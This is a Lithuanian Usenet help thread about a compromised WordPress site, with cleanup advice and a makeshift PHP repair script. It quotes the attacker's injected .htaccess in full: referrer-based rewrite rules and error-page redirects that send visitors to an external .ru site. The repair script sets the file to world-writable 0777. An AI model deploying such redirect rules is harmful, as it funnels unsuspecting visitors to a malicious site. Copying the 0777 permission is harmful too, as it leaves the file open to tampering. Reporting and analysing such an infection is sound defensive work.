Re: Įsilaužimas į svetainę - keičiamas .htaccess failas [FX @ 2012-02-07 10:26:54]

Tema: Re: Įsilaužimas į svetainę - keičiamas .htaccess failas
Autorius: FX
Data: 2012-02-07 10:26:54
Bet tai koks gaidys atsiprashant :D jei kazhkas sugebejo perrashyti 
..htaccess failiuka ir dar zhaisti su jo permisionais tai ir duombazes 
prisijungimus gali ishsitraukti ish wp-config.php failiuko :DDD

FX

"useris"  wrote in message news:jgpmac$e1m$1@trimpas.omnitel.net...

Taip ir dariau, tik kad permisionus pasikeisdavo backdooras kaip jam
reikedavo, buvo atskiras .php failas _cache.php, kurį pervadinus susitvarkė
bėda.
Paswordus pakeičiau, išskyrus mySQL, bo pastarojo neina dėl Hostex plesk
panelės ypatumų.


"FX" <somebody@apple.com> wrote in message
news:jgo7nb$7n3$1@trimpas.omnitel.net...
> Turejau ir ash shita malonuma :D
>
> 1. pakeisk ftp ir kitus slaptazhodzhius
> 2. pakeisk y savo htaccess failiuka ir permisionus berods 444 uzhdek
> 3. prasichekink ar nera kuris nors ish php failiuku itartinai didelis ir 
> pazhek ar itartinai dideliame nera koduko papiktinto su base64
>
> P.S. pasidaryk greitai nes guglas inmes tave y malwarininku sarashus :)
>
> FX
>
> "useris"  wrote in message news:jgkg9j$jf6$1@trimpas.omnitel.net...
>
> Pakeisto .htaccess failo tūrinys:
>
>
>                              <IfModule mod_rewrite.c>
>                              RewriteEngine On
>                              RewriteCond %{HTTP_REFERER}
> ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
>                              RewriteRule ^(.*)$
> http://xisicongatarc.ru/emain/index.php [R=301,L]
>                              RewriteCond %{HTTP_REFERER}
> ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
>                              RewriteRule ^(.*)$
> http://xisicongatarc.ru/emain/index.php [R=301,L]
>                              </IfModule>
>
>
> # BEGIN WordPress
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteBase /
> RewriteRule ^index\.php$ - [L]
> RewriteCond %{REQUEST_FILENAME} !-f
> RewriteCond %{REQUEST_FILENAME} !-d
> RewriteRule . /index.php [L]
> </IfModule>
> # END WordPress
>
>
>
>                              ErrorDocument 400
> http://xisicongatarc.ru/emain/index.php
>                              ErrorDocument 401
> http://xisicongatarc.ru/emain/index.php
>                              ErrorDocument 403
> http://xisicongatarc.ru/emain/index.php
>                              ErrorDocument 404
> http://xisicongatarc.ru/emain/index.php
>                              ErrorDocument 500
> http://xisicongatarc.ru/emain/index.php
>
>
>
>
>
>
>
> Laikinai pasirašiau php skriptelį, kad nereikėtų rankom vis trint kodo,
> tačiau reikia vis paleidinėtį jį, kad suveiktų
>
> <?php
>
> chmod(".htaccess", 0777);  // octal; correct value of mode
>
> $myFile = ".htaccess";
> $fh = fopen($myFile, 'w') or die("can't open file");
>
> $stringData = "
> # BEGIN WordPress
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteBase /
> RewriteRule ^index\.php$ - [L]
> RewriteCond %{REQUEST_FILENAME} !-f
> RewriteCond %{REQUEST_FILENAME} !-d
> RewriteRule . /index.php [L]
> </IfModule>
> # END WordPress";
>
> fwrite($fh, $stringData);
>
> fclose($fh);
>
> ?>